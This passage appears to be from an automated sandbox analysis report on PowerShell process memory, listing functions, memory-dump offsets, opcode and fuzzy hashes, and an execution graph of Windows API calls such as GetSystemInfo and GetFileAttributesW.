                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 72324b3ef40b561cfc562abd7b2b000848a53a50234e10ebf0c807bcb2407b0f
                                                                                                  • Instruction ID: f4f94c606c95f2f3051d6c04f5668d08a46255c6fad0c2307ea52961459ccbb6
                                                                                                  • Opcode Fuzzy Hash: 72324b3ef40b561cfc562abd7b2b000848a53a50234e10ebf0c807bcb2407b0f
                                                                                                  • Instruction Fuzzy Hash: 18B01237395120C75848216974480BEF316E6C0037224802BE20FC00C18A610C430150
                                                                                                  Function 08203690 Relevance: .0, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e134b5701887b2e317188a0c1107d992667fd257829c347ffdfccd084924ad6c
                                                                                                  • Instruction ID: ecf52586106e3535cca1a2792eef35d11ec76052bd98f0804d69ec52f1e53189
                                                                                                  • Opcode Fuzzy Hash: e134b5701887b2e317188a0c1107d992667fd257829c347ffdfccd084924ad6c
                                                                                                  • Instruction Fuzzy Hash: 89C08C3918C2D1CEC3921374AB200943F3029C2101709CC9EC0D881823CB28C02CA751
                                                                                                  Function 08346740 Relevance: .0, Instructions: 7COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                                                  • Instruction ID: 96a74fec5220f98754945e00ce640a92889f3d2d232068f8612b65c1e83e2114
                                                                                                  • Opcode Fuzzy Hash: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                                                  • Instruction Fuzzy Hash: B4B092351502088F82009B68E448C4073E8AB08A253114090E10C8B232C621FC008A40
                                                                                                  Function 08203980 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1ec1fade3c7c9d74886f3e2e4c74f20833fab4e9dc760f2f7fcefd91d918c9b4
                                                                                                  • Instruction ID: f1e968e7b24b16d73743b7bdc3a07a874e5a0a1284347f709f3ff49c2efc291c
                                                                                                  • Opcode Fuzzy Hash: 1ec1fade3c7c9d74886f3e2e4c74f20833fab4e9dc760f2f7fcefd91d918c9b4
                                                                                                  • Instruction Fuzzy Hash: D3A0223000030C8B8A8033B83808888330CB2C082238088A8E00C830008F3AE00088C0
                                                                                                  Function 082033F0 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51f7762686d08cbd2578f167e76c97f2f10938348de60c2a4c6d17f0ce2c72c2
                                                                                                  • Instruction ID: 5dc5eb2377275900b45279e35fca3a34f815b50534bc52295aec1a91c69c38c7
                                                                                                  • Opcode Fuzzy Hash: 51f7762686d08cbd2578f167e76c97f2f10938348de60c2a4c6d17f0ce2c72c2
                                                                                                  • Instruction Fuzzy Hash: BCA0223000030C8B830023B0B808808330CB2C0A00FA08828E00C830008F32E00088C0
                                                                                                  Function 08203630 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 157962a3cc7e4fa6761263f31bef5212bd37dbbffbe20fabe568c1798e3466ce
                                                                                                  • Instruction ID: b12667c822274be6d600f32f08c22220d2e808e0ba304ad0381bdbf6704c10ca
                                                                                                  • Opcode Fuzzy Hash: 157962a3cc7e4fa6761263f31bef5212bd37dbbffbe20fabe568c1798e3466ce
                                                                                                  • Instruction Fuzzy Hash: CBA0223000030C8B820023B0B80888A330CA2C0A003808828E00C838008F32E00088C0
                                                                                                  Function 082036A0 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 092a8a3ea91c0561a1155ba87ef0c7b2834277077842781c05c677072e42f176
                                                                                                  • Instruction ID: f56b99ee9960b90794788d606604d8211529cc4a43f85a82bbd0286a449fcb13
                                                                                                  • Opcode Fuzzy Hash: 092a8a3ea91c0561a1155ba87ef0c7b2834277077842781c05c677072e42f176
                                                                                                  • Instruction Fuzzy Hash: 3CA0223000030C8B828023B8B808888330CB2C0A22380C828E00C830008F32E00088C0

                                                                                                  Non-executed Functions

                                                                                                  Function 082BEDAC Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^Et$^Et$^Et$^Et
                                                                                                  • API String ID: 0-240611557
                                                                                                  • Opcode ID: d555617a8b4925932b9b7de453d8987640437eac453ba771c1279f11196e3e2a
                                                                                                  • Instruction ID: 650a7bb94bbd553dcc8c35d64250fbd1723c996eca84bf737c3e040e68c3d679
                                                                                                  • Opcode Fuzzy Hash: d555617a8b4925932b9b7de453d8987640437eac453ba771c1279f11196e3e2a
                                                                                                  • Instruction Fuzzy Hash: D2816B34F102059FEB18DB78C855BAAB7A6AFC8341F15C529E806EB395DE35DC019BA0
                                                                                                  Function 08204548 Relevance: 10.4, Strings: 8, Instructions: 435COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$Ld>t$Ld>t$Ld>t$Ld>t$Ld>t$Ld>t
                                                                                                  • API String ID: 0-3506153176
                                                                                                  • Opcode ID: b794860c8672b81df5287e765aa70b8671e11bf3092fe6474bda2a23299327d7
                                                                                                  • Instruction ID: ebb7a59d8e97be8df5605b55691113d78c7177f84ba7e9fac4d27a28af40e53b
                                                                                                  • Opcode Fuzzy Hash: b794860c8672b81df5287e765aa70b8671e11bf3092fe6474bda2a23299327d7
                                                                                                  • Instruction Fuzzy Hash: 81022934B102059FDB14EBA8C994AAEB7B6BF88305F148529E506EB395DF30ED02CF55
                                                                                                  Function 08280568 Relevance: 7.9, Strings: 6, Instructions: 360COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$"Et$"Et$Ld>t$Ld>t
                                                                                                  • API String ID: 0-1247639692
                                                                                                  • Opcode ID: ee5c6074314015963d1664b5851590eef9d41bc827cc2caf7026d777b5c9421e
                                                                                                  • Instruction ID: 0717c382c9a09f76929086762801b700de56f0930903551fe51feebb8bb673e1
                                                                                                  • Opcode Fuzzy Hash: ee5c6074314015963d1664b5851590eef9d41bc827cc2caf7026d777b5c9421e
                                                                                                  • Instruction Fuzzy Hash: 18E1FA34B00208DFDB54DBA5D854AAEB7B6FF88300F248569E40AAB395DF359D06CB91
                                                                                                  Function 08332540 Relevance: 6.4, Strings: 5, Instructions: 180COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$"Et$Ld>t$Ld>t
                                                                                                  • API String ID: 0-3908786510
                                                                                                  • Opcode ID: e58fd12cb0342c55dbfc6a0c48c55ffe6e85ce797603cfed2aa5b397edcbb999
                                                                                                  • Instruction ID: 05cb42dc58b0511ad85c916098b5490fd475e584862386686403d40b26f750f4
                                                                                                  • Opcode Fuzzy Hash: e58fd12cb0342c55dbfc6a0c48c55ffe6e85ce797603cfed2aa5b397edcbb999
                                                                                                  • Instruction Fuzzy Hash: 6E515C34700220DFDB18EB79D468A2E73E6BFCD74272544A9E406DB3A1EF64DD019B91
                                                                                                  Function 08280558 Relevance: 5.3, Strings: 4, Instructions: 310COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$"Et$Ld>t
                                                                                                  • API String ID: 0-1007899502
                                                                                                  • Opcode ID: 1fe5d38bfc62ca50f06d6dbe224f06fc07f7c1eae48c2b42aa5fc16a6b623d6b
                                                                                                  • Instruction ID: 3c33e9b9c4bea413cb27689f4448e7574c51ad6e02bd2f195265f382100c63bc
                                                                                                  • Opcode Fuzzy Hash: 1fe5d38bfc62ca50f06d6dbe224f06fc07f7c1eae48c2b42aa5fc16a6b623d6b
                                                                                                  • Instruction Fuzzy Hash: A8C1F834B00208DFDB54DBA5D894AAEB7F2FF88300F248569E409AB395DF319D06CB91
                                                                                                  Function 08203B28 Relevance: 5.2, Strings: 4, Instructions: 223COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$Ld>t$Ld>t
                                                                                                  • API String ID: 0-1807289640
                                                                                                  • Opcode ID: 9b4b73a45677374e0b981f145269279736f676f5f230ff5aa7b33f7118a5e429
                                                                                                  • Instruction ID: 4b117a6c6fa3c6a5978bec29ae5477b2b358f6f619124ec2286ec728718e8cca
                                                                                                  • Opcode Fuzzy Hash: 9b4b73a45677374e0b981f145269279736f676f5f230ff5aa7b33f7118a5e429
                                                                                                  • Instruction Fuzzy Hash: 5791F934B101059FDB08DB68D998AAEB7A6FFC8201B148568D80ADB395DF34DC42CF61

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.7%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:34
                                                                                                  Total number of Limit Nodes:1
                                                                                                  execution_graph 37301 7ffb10d2379d 37305 7ffb10d237b7 37301->37305 37304 7ffb10d23927 37306 7ffb10d239e4 37304->37306 37314 7ffb10d1a748 37304->37314 37305->37304 37310 7ffb10d1a738 37305->37310 37307 7ffb10d23953 37309 7ffb10d23985 37307->37309 37318 7ffb10d23a1f 37307->37318 37311 7ffb10d1a741 ComputeAccessTokenFromCodeAuthzLevel 37310->37311 37313 7ffb10d23d8e 37311->37313 37313->37304 37315 7ffb10d1a750 ComputeAccessTokenFromCodeAuthzLevel 37314->37315 37317 7ffb10d23d8e 37315->37317 37317->37307 37319 7ffb10d23a2a 37318->37319 37320 7ffb10d23a72 IdentifyCodeAuthzLevelW 37318->37320 37319->37309 37322 7ffb10d23bce 37320->37322 37277 7ffb10d19911 37278 7ffb10d19941 GetFileAttributesW 37277->37278 37280 7ffb10d199a6 37278->37280 37281 7ffb10d22675 37283 7ffb10d2268f 37281->37283 37282 7ffb10d2281c 37283->37282 37284 7ffb10d227ff 37283->37284 37287 7ffb10d1d748 37283->37287 37291 7ffb10d22854 ComputeAccessTokenFromCodeAuthzLevel ComputeAccessTokenFromCodeAuthzLevel IdentifyCodeAuthzLevelW 37284->37291 37288 7ffb10d229a0 37287->37288 37290 7ffb10d229bf 37288->37290 37292 7ffb10d1d760 37288->37292 37290->37284 37291->37282 37295 7ffb10d23390 37292->37295 37294 7ffb10d23408 37294->37290 37295->37294 37296 7ffb10d23766 ComputeAccessTokenFromCodeAuthzLevel ComputeAccessTokenFromCodeAuthzLevel IdentifyCodeAuthzLevelW 37295->37296 37296->37294 37297 7ffb10d242c9 37298 7ffb10d242cb GetSystemInfo 37297->37298 37300 7ffb10d2435e 37298->37300

                                                                                                  Executed Functions

                                                                                                  Function 00007FFB1111BAB1 Relevance: 4.0, Strings: 3, Instructions: 230COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2125972588.00007FFB11110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11110000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$(${
                                                                                                  • API String ID: 0-1376972122
                                                                                                  • Opcode ID: a813c074247667602c5af72920ccc5f6b36ace76a4c413a85217c0d9eef8d2a8
                                                                                                  • Instruction ID: 32711a8dd8a63e561f779556b0aa0afb8a54498a970859d0b210709f490542b3
                                                                                                  • Opcode Fuzzy Hash: a813c074247667602c5af72920ccc5f6b36ace76a4c413a85217c0d9eef8d2a8
                                                                                                  • Instruction Fuzzy Hash: 576114D7D0CBD10FF3965A349C5A6F4BFA1FF92714B4A06A7C444861D3ED0A6A1B8341
                                                                                                  Function 00007FFB1137FB40 Relevance: .5, Instructions: 520COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2131281994.00007FFB11370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11370000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11370000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1debc00c76fd1f603ca15ccd23d7ff2aaf7235d2ad303d65c1b3b5897f508c2c
                                                                                                  • Instruction ID: acd33c4724d586b8f4fe3cad1047e9977672f734c96a9afcf58e649b95facd3e
                                                                                                  • Opcode Fuzzy Hash: 1debc00c76fd1f603ca15ccd23d7ff2aaf7235d2ad303d65c1b3b5897f508c2c
                                                                                                  • Instruction Fuzzy Hash: 8B027F71A18A499FDB94EF28C495BA977E2FF68314F14017AE40ED7296CE34E841CB81
                                                                                                  Function 00007FFB114D411E Relevance: .5, Instructions: 483COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2135842001.00007FFB114D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB114D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb114d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cedba99ccfe936057bee8e41c70e6351b653165831b2e2a4ff23e78d594f152
                                                                                                  • Instruction ID: 7d9459b3623bc9f3a90d049e8da78a5c1882238c03346a770b3d516d8cf17ef5
                                                                                                  • Opcode Fuzzy Hash: 7cedba99ccfe936057bee8e41c70e6351b653165831b2e2a4ff23e78d594f152
                                                                                                  • Instruction Fuzzy Hash: F7F116B2E0CB498FEB45EB78C4916E97FE1EF65350F0801B6D048D7293DE28A9468B51
                                                                                                  Function 00007FFB113A2B9E Relevance: .5, Instructions: 469COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2131281994.00007FFB11370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11370000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11370000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c205911539e1ae5f484f62d8aef1ab5ceb404c6a1f0cc65bd37fb6c6b33195ce
                                                                                                  • Instruction ID: 59aba1480e9975b21b6817d81885a26ad4581de2ec0139bddf02afb4e1cf1771
                                                                                                  • Opcode Fuzzy Hash: c205911539e1ae5f484f62d8aef1ab5ceb404c6a1f0cc65bd37fb6c6b33195ce
                                                                                                  • Instruction Fuzzy Hash: FDD1A3B2E18D5E4BEB98EB6CE4556BDB7D6FF58350F500139D04EC329ADE28AC424780
                                                                                                  Function 00007FFB113A3200 Relevance: .2, Instructions: 155COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2131281994.00007FFB11370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11370000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11370000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 57262906079ef02cb619f911568a21749c8d6d164ea3c4d47e66ed10544f2e71
                                                                                                  • Instruction ID: 7695781c23e4998e3982dd3b7ae9e76251ecdf4175546341c0af37ce616924e1
                                                                                                  • Opcode Fuzzy Hash: 57262906079ef02cb619f911568a21749c8d6d164ea3c4d47e66ed10544f2e71
                                                                                                  • Instruction Fuzzy Hash: 4641F3A2A1DD491FE394E73CE858776ABD2EF9A320F0940B7E08DC7296DE189C058751
                                                                                                  Function 00007FFB114D0A5C Relevance: .1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2135842001.00007FFB114D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB114D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb114d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d434816fe361f8a6485526fc7ff0ded94f2ca82888477da99ec2a1286bb804e
                                                                                                  • Instruction ID: 54561436552210103eb5b3dbfb289c630f451d63091b310cc3613f08113fb577
                                                                                                  • Opcode Fuzzy Hash: 4d434816fe361f8a6485526fc7ff0ded94f2ca82888477da99ec2a1286bb804e
                                                                                                  • Instruction Fuzzy Hash: 6431256270DE4E8FEF94DA7C88A412477C6EFA967471842BAD04DC72A1DD609C15C741
                                                                                                  Function 00007FFB114DF274 Relevance: .1, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2135842001.00007FFB114D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB114D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb114d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 500b3c9d90b6633913e9dcf31f477fbd261700ae69d20dd6448ecf93b4043d79
                                                                                                  • Instruction ID: b9cbbe27a6c9d3fce8b2c197e3ad753f408af2088fefa36c9cd4811f4abe8902
                                                                                                  • Opcode Fuzzy Hash: 500b3c9d90b6633913e9dcf31f477fbd261700ae69d20dd6448ecf93b4043d79
                                                                                                  • Instruction Fuzzy Hash: D9213071A0890D4EEF84EBB8D4456FEBBE1EF99301F11017AD40DE3282DF25A8458791
                                                                                                  Function 00007FFB1139D998 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2131281994.00007FFB11370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11370000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11370000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74ef62127dfcf0f24835fae97b006bf0c68ec577f0c3191f2fc108259c34c8ad
                                                                                                  • Instruction ID: 20e781f412abe6b7b8708457f12873e9e402ba551340c0f0199997c580627ec9
                                                                                                  • Opcode Fuzzy Hash: 74ef62127dfcf0f24835fae97b006bf0c68ec577f0c3191f2fc108259c34c8ad
                                                                                                  • Instruction Fuzzy Hash: B111C171B1DC095FEBA4EE6CD0C9A7AB3D6EF98311B60417AD04DC3395DE24AC428380
                                                                                                  Function 00007FFB114DDA4C Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2135842001.00007FFB114D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB114D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb114d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 865d514b17e456c8ef84378b447985a0365704eec0dc69d87c0c1fcbf43dc5c9
                                                                                                  • Instruction ID: 46848b647281f7225301deddc3c18a3cc18293fad2a4b3783e5a205348b76c1b
                                                                                                  • Opcode Fuzzy Hash: 865d514b17e456c8ef84378b447985a0365704eec0dc69d87c0c1fcbf43dc5c9
                                                                                                  • Instruction Fuzzy Hash: FEF062313288098FDB88EB2CD465AF573D2EBA8355B2041BDD409C73D5CE26EC41C781
                                                                                                  Function 00007FFB1139D990 Relevance: .0, Instructions: 1COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000012.00000002.2131281994.00007FFB11370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11370000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_18_2_7ffb11370000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b75bbd389cf1b1c833cdef5ae21aed7836bbf1ad4af1857e309242b01891634
                                                                                                  • Instruction ID: f04e090c2c9f8979892f7ac4c63cdf1e3fc45d2c8a354b3d953116fb4a56ddf6
                                                                                                  • Opcode Fuzzy Hash: 2b75bbd389cf1b1c833cdef5ae21aed7836bbf1ad4af1857e309242b01891634
                                                                                                  • Instruction Fuzzy Hash: